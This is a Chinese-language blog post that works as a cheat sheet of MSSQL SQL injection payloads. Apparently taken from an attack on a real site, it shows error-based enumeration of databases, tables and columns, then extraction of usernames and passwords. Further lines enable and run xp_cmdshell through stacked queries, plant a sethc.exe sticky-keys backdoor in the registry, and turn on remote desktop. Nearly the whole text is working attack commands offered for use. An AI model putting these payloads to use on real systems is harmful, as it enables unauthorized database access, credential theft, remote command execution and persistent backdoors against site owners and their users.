Sh4dow's Blog

PS：每次都要翻翻文章，这次好了。这次遇到了个全的一次全记录下来。

and 1=(select @@VERSION) --

爆字表和字段 a’having 1=1 --

如何表是在用户密码的那个表（登陆框注入）就直接：

group by pub_user_inf.userid having 1=1-- 

group by pub_user_inf.userid，pub_user_inf.username having 1=1-- 

暴用户
' and (select top 1 pub_user_inf.username from pub_user_inf )>0--

暴密码
 ' and (select top 1 pub_user_inf.password from pub_user_inf )>0--

如果表不在那就要先来数据库:

sysdatabases是MSSQL默认系统表.包含“master”，“msdb”，“mssqlweb”，“empdb”，“model”这五个表，对应的bdid的值为1到5

and 1=(select name from master.dbo.sysdatabases where dbid=5)--

暴表：

and 1=convert(int,(select top 1 table_name from information_schema.tables))--

and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in

('SubSiteStarPeriod','BlogPhoto','UserCreatePrivilege','VideoTest','CirclePhoto','SubSiteMenu','UserDetail','VideoTestExam','TrainCours

e','UDiskFolder','SubSiteInternalIp','TrainClassCource','SubSiteGuestBookGroup','VideoMeeting','Privilege','VideoChannelItem','SubSiteG

uestBook','VideoMeetingUserAssociate','DistributeSiteRegister','SubSiteCustomSkin','InfoSearch','SubSiteArticleCategory','ManageWidget'

,'CircleUser','VideoConfig','InfoSearchField','SubSiteSpecial','SystemBlacklistIp','VideoChannelItemAssociate','AbsenceRecord','InfoSea

rchCondition','SystemContributeConditionObject','SiteBasicProperty','Organization','Tag','CircleConfig','SubSiteGuestBookAndGroupAssoci

ate','SystemInternalIp','VideoAd','CropScale','SubSiteGuestBookMessage','SystemMenuPrivilege','MessageContent','ForumConfig','SubSiteAr

ticleCategoryAndGroupAssociate')))--

暴列：

&kw=1') and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CircleConfig'))--

and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='CircleUser' and column_name not in('pkId','userId','identity','adminType','dutyId','userPhoto','isActive','circleId','joinDate','showOrder','joinIp','loginTimes','lastLoginTime','lastLoginIp','articleNums','recommendArticleNums','modulePurview','fullName','nickName','blogName','blogId','userIntro','type')))--

只能一个一个的排列了列数据。

再就是cmdshell 了

1，创建一个包含两个字段tmp1，tmp2的r3dm0v3_sql表

/2.aspxid=1;+CREATE+TABLE+r3dm0v3_sql+(tmp1+varchar(8000),tmp2+varchar(8000))-- 

2，将执行结果存入tmp1表中

/2.aspxid=1;+insert+into+r3dm0v3_sql+(tmp1)+exec+master..xp_cmdshell+'net+user'—

开户cmdshell:

EXEC sp_configure 'show advancedoptions',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--

删除表：

drop+table+r3dm0v3_sql--

写入shift后门

exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_SZ','c:\\windows\\system32\\taskmgr.exe'

查看远程桌面开启

exec xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections' 

开启远程桌面

exec xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer','fDenyTSConnections','REG_DWord',0